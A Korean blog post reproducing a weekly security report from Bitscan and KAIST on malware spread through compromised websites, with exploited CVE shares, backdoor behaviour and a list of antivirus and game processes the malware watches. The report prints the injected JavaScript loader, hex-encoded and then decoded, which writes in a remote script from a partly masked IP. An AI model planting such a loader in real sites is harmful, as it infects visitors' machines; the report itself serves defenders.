태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

 빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 5주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며차주부터 대규모로 확장된 상태로 운영 되고 있어서국내 인터넷 위협에 대한 주간 동향으로 참고하셔도 충분 할 것입니다.


 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


금주 차의 특징은 2주전부터 언급 드렸던 공격자들의 전략적인 공격이 대폭 확대 되는 특징을 보이고 있습니다신규 악성링크 및 악성코드들은 전주와 대동소이한 양상을 보이고 있으나실제 악성링크 하나가 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였습니다즉 중간 경로를 이용한 효율적 공격들이 대거 관찰 되고 있어서 전주 대비 영향력 면에서는 비교하기가 어려울 정도로 위험성이 높은 상태 입니다.

 

금주의 악성코드 유포지로 이용된 웹서비스들은 412곳 이상이며 전주 대비 대폭 증가 되었으며 현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 백여 개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 되고 있습니다악성링크가 삽입된 웹서비스들의 대응이 많이 부족한 상태라 계속 재발 되고 있으며대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다기존의 봇넷과는 다른 형태의 악성코드 전파용 네트워크라 할 수 있습니다Malware net 이라 불러야 할 정도로 판단됩니다.


 




대표적으로 대규모 확산된 악성링크는 http://www.xxxxxx.com/script/js/script.js 이며 국내 주요 웹서비스 100여곳 이상의 웹서비스 코드에 해당 링크가 추가 되어 방문시 마다 자동 실행을 통해 좀비 PC 감염을 확대 하고 있습니다본 요약을 작성하는 현재 6.6일 오후 3시에도 운영이 되고 있으며 내부에 들어 있는 코드는 다음과 같습니다.


* 본 링크에 대한 공개는 공개된 글로 언급하는 것은 부적절하여 언급 하지 않도록 합니다.  현재 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 100여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다. 공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

 


if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%35%30%2E%31%31%37%2E%31%31%33%2E???%2F%70%69%63%2F%69%6D%67%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"));}


Hex  Decode 


-> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://50.117.113.XXX/pic/img.js></script>"));}

 

이처럼 중간 경로를 가지고 최종 사용자를 공격하는 악성코드들을 자유롭게 변경하고 대규모로 운영을 할 수 있는 상황이 현재입니다.



결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중이나 현재 분석 및 대응이 완료된 상태로 분석에는 문제가 없는 상태를 유지 하고 있습니다.

 

악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고악성코드 유포 인지도 못하는 상태라서대응이 되지 않는 악순환이 계속 되고 있습니다이제 공격자들은 자유로운 재활용을 넘어악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다전주의 예상 드린 바와 동일하게 진행이 되고 있으며 5 4주차에 차단을 권고 드린IP 대역 대부분을 모두 재활용 하였습니다만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

 

전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 주의 단계를 지난 상태로 보입니다.

 

5 5주차 특징은 다음과 같습니다.


 

특징

  • · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속
  • · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임
  • · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대

          * 최대 100여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

  • · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술루트킷(APT 형태유포 확대
  • · 4월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

 

악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


*유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

 


사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다


패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다감염 이후에 대응은 휠씬 더 큰 피해를 입은 이후에 많은 비용과 자원 투입이 되어야 복구가 된다는 점을 잘 알고 계실 것 같습니다.


  •  Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

  • 1,2,5 기술보고서에 언급된 루트킷 및 키로거백도어 기능을 가진 악성코드들은사용자 PC의 드라이버 및 시스템 파일 교체윈도즈 서비스 등록등을 실행하고내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

      * 해당 보고서들은 정식 구독 신청 및 시범 서비스 신청하신 기관/기업에만 제공 됩니다. 

  • 4번 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다.모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다. 금융권도 다르지 않습니다.


프로세스명

프로그램명

백 신

sgbider.exe

vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc

nsvmon.npc

Nsavsvc.npc

NaverAgent.exe

네이버백신

V3LRun.exe

MUpdate2.exe

SgSvc.exe

V3Light.exe

V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye

AYRTSrv.aye

SkyMon.exe

AYServiceNT.aye

AYupdate.aye

AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com

dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

 

  • 5 2주차에 발견된 가상머신 실행을 감지(Vmware  magic number)하고 종료하거나 분석을 회피하도록 설계된 악성코드의 대량 유포는 계속 진행 되고 있습니다.

 

· 항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 할 수 있으므로 심각한 주의가 필요합니다더군다나 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다


APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다대응에 참고 하십시요.


 

사용된 취약성 비율

- CVE 2011-3544 ( 24.2%) Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 28.3%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고

- CVE 2012-0754 (26.3%) Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (1.0%) IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

 

금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다강력한 차단을 유지하실 것을 권고 합니다.

 

차단 권고 대역

각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 활용 하십시요.

 

-본 지면에서는 공개 하지 않습니다.

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.
 
정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.
 
본 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크 및 악성코드 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.

Posted by 바다란

댓글을 달아 주세요